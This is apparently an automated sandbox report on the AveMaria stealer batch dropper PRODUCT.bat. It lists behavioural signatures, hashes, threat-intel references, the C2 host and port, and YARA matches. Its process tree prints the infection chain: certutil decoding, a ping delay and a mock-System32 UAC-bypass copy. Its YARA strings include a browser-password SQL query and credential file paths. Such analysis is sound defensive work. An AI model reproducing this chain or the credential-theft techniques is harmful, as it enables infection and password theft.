Edit tour

Windows Analysis Report
PRODUCT.bat

Overview

General Information

Sample name:	PRODUCT.bat
Analysis ID:	1387342
MD5:	82934f26cfc4b72a15289fe4055faca3
SHA1:	1a3d048f809a5dad4ee89670b94f42cf708b199a
SHA256:	277a01095a13bf08041d5a78c06f9f9ff32e77665e03cdd32c83ddc32a52fa59
Tags:	AveMariaRATbatRAT
Infos:

Detection

AveMaria, DBatLoader, UACMe

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Yara detected AveMaria stealer

Yara detected DBatLoader

Yara detected UACMe UAC Bypass tool

Allocates many large memory junks

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if Internet connection is working

Contains functionality to hide user accounts

Contains functionality to inject threads in other processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal e-mail passwords

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after checking mutex)

Found large BAT file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Increases the number of concurrent connection per server for Internet Explorer

Installs a global keyboard hook

Machine Learning detection for dropped file

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to create new users

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to get notified if a device is plugged in / out

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 4916 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PRODUCT.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5236 cmdline: cmd /c del "C:\Users\Public\pointer.com" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

certutil.exe (PID: 3756 cmdline: certutil -decodehex "C:\Users\user\Desktop\PRODUCT.bat" "C:\Users\Public\pointer.com" 3 MD5: F17616EC0522FC5633151F7CAA278CAA)

conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5956 cmdline: cmd /c PING -n 2 127.0.0.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

PING.EXE (PID: 7040 cmdline: PING -n 2 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

cmd.exe (PID: 2004 cmdline: cmd /c start C:\Users\Public\pointer.com MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

pointer.com (PID: 2596 cmdline: C:\Users\Public\pointer.com MD5: 9D00A95BE6B82AB307043A988595487B)

cmd.exe (PID: 3664 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6648 cmdline: cmd /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xcopy.exe (PID: 6836 cmdline: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y MD5: 7E9B7CE496D09F70C072930940F9F02C)

cmd.exe (PID: 7192 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xcopy.exe (PID: 7200 cmdline: xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y MD5: 7E9B7CE496D09F70C072930940F9F02C)

cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xcopy.exe (PID: 7236 cmdline: xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y MD5: 7E9B7CE496D09F70C072930940F9F02C)

cmd.exe (PID: 7260 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xcopy.exe (PID: 7268 cmdline: xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y MD5: 7E9B7CE496D09F70C072930940F9F02C)

dbkyovyK.pif (PID: 6644 cmdline: C:\Users\Public\Libraries\dbkyovyK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cmd.exe (PID: 4248 cmdline: cmd /c exit /b 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Kyvoykbd.PIF (PID: 7344 cmdline: "C:\Users\Public\Libraries\Kyvoykbd.PIF" MD5: 9D00A95BE6B82AB307043A988595487B)

dbkyovyK.pif (PID: 7536 cmdline: C:\Users\Public\Libraries\dbkyovyK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Kyvoykbd.PIF (PID: 7592 cmdline: "C:\Users\Public\Libraries\Kyvoykbd.PIF" MD5: 9D00A95BE6B82AB307043A988595487B)

dbkyovyK.pif (PID: 7688 cmdline: C:\Users\Public\Libraries\dbkyovyK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Ave Maria, AveMariaRAT, avemaria	Information stealer which uses AutoIT for wrapping.	Anunak	http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery https://asec.ahnlab.com/en/36629/ https://blog.morphisec.com/syk-crypter-discord https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
UACMe	A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.	No Attribution	https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ https://github.com/hfiref0x/UACME	https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

Malware Configuration

Threatname: AveMaria

{"C2 url": "burger042.ddnsfree.com", "port": 1977, "Proxy Port": 0}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
PRODUCT.bat	MALWARE_BAT_KoadicBAT	Koadic post-exploitation framework BAT payload	ditekSHen	0x2:$s1: &@cls&@set 0x59:$s2: :~14,1%% 0x6d:$s2: :~61,1%% 0x78:$s2: :~58,1%% 0x83:$s2: :~3,1%% 0x8d:$s2: :~59,1% 0x9e:$s2: :~21,1%% 0xa9:$s2: :~34,1%% 0xb4:$s2: :~12,1%% 0xbf:$s2: :~3,1%% 0xc9:$s2: :~13,1%% 0xd4:$s2: :~33,1%% 0xdf:$s2: :~30,1%% 0xea:$s2: :~29,1%% 0xf5:$s2: :~19,1%% 0x100:$s2: :~37,1%% 0x10b:$s2: :~20,1%% 0x116:$s2: :~24,1%% 0x121:$s2: :~60,1%% 0x12c:$s2: :~22,1%% 0x137:$s2: :~61,1%%

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\Kyvoykbd.PIF	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
C:\Users\Public\pointer.com	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000001D.00000002.1918637421.0000000000554000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000000E.00000001.1696850208.0000000000554000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
00000019.00000001.1834966037.0000000000554000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000000.1646752088.0000000000401000.00000020.00000001.01000000.00000004.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x2680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0xe64:$a2: SMTP Password 0x25d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x8f0:$a6: \Torch\User Data\Default\Login Data 0x1450:$a8: "os_crypt":{"encrypted_key":" 0xd2c:$a10: \logins.json 0x13c8:$a11: Accounts\Account.rec0 0x2358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1bb98:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1a37c:$a2: SMTP Password 0x19430:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1e908:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1bae8:$a5: for /F "usebackq tokens=*" %%A in (" 0x19e08:$a6: \Torch\User Data\Default\Login Data 0x1ea28:$a7: /n:%temp%\ellocnak.xml 0x1a968:$a8: "os_crypt":{"encrypted_key":" 0x1ea58:$a9: Hey I'm Admin 0x1a244:$a10: \logins.json 0x1a8e0:$a11: Accounts\Account.rec0 0x1b870:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000008.00000003.1691476533.000000007EB40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1bbc8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1a3ac:$a2: SMTP Password 0x19460:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1e938:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1bb18:$a5: for /F "usebackq tokens=*" %%A in (" 0x19e38:$a6: \Torch\User Data\Default\Login Data 0x1ea58:$a7: /n:%temp%\ellocnak.xml 0x1a998:$a8: "os_crypt":{"encrypted_key":" 0x1ea88:$a9: Hey I'm Admin 0x1a274:$a10: \logins.json 0x1a910:$a11: Accounts\Account.rec0 0x1b8a0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x6428:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4c0c:$a2: SMTP Password 0x3cc0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0xd90:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x6378:$a5: for /F "usebackq tokens=*" %%A in (" 0x4698:$a6: \Torch\User Data\Default\Login Data 0xeb0:$a7: /n:%temp%\ellocnak.xml 0x51f8:$a8: "os_crypt":{"encrypted_key":" 0xee0:$a9: Hey I'm Admin 0x4ad4:$a10: \logins.json 0x5170:$a11: Accounts\Account.rec0 0x6100:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c690:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae74:$a2: SMTP Password 0x19f28:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5e0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a900:$a6: \Torch\User Data\Default\Login Data 0x1b460:$a8: "os_crypt":{"encrypted_key":" 0x1ad3c:$a10: \logins.json 0x1b3d8:$a11: Accounts\Account.rec0 0x1c368:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3f50:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x2734:$a2: SMTP Password 0x17e8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x3ea0:$a5: for /F "usebackq tokens=*" %%A in (" 0x21c0:$a6: \Torch\User Data\Default\Login Data 0x2d20:$a8: "os_crypt":{"encrypted_key":" 0x25fc:$a10: \logins.json 0x2c98:$a11: Accounts\Account.rec0 0x3c28:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ad58:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1953c:$a2: SMTP Password 0x185f0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1dac8:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1aca8:$a5: for /F "usebackq tokens=*" %%A in (" 0x18fc8:$a6: \Torch\User Data\Default\Login Data 0x1dbe8:$a7: /n:%temp%\ellocnak.xml 0x19b28:$a8: "os_crypt":{"encrypted_key":" 0x1dc18:$a9: Hey I'm Admin 0x19404:$a10: \logins.json 0x19aa0:$a11: Accounts\Account.rec0 0x1aa30:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000008.00000003.1696692635.000000007EEF4000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x6428:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4c0c:$a2: SMTP Password 0x3cc0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0xd90:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x6378:$a5: for /F "usebackq tokens=*" %%A in (" 0x4698:$a6: \Torch\User Data\Default\Login Data 0xeb0:$a7: /n:%temp%\ellocnak.xml 0x51f8:$a8: "os_crypt":{"encrypted_key":" 0xee0:$a9: Hey I'm Admin 0x4ad4:$a10: \logins.json 0x5170:$a11: Accounts\Account.rec0 0x6100:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
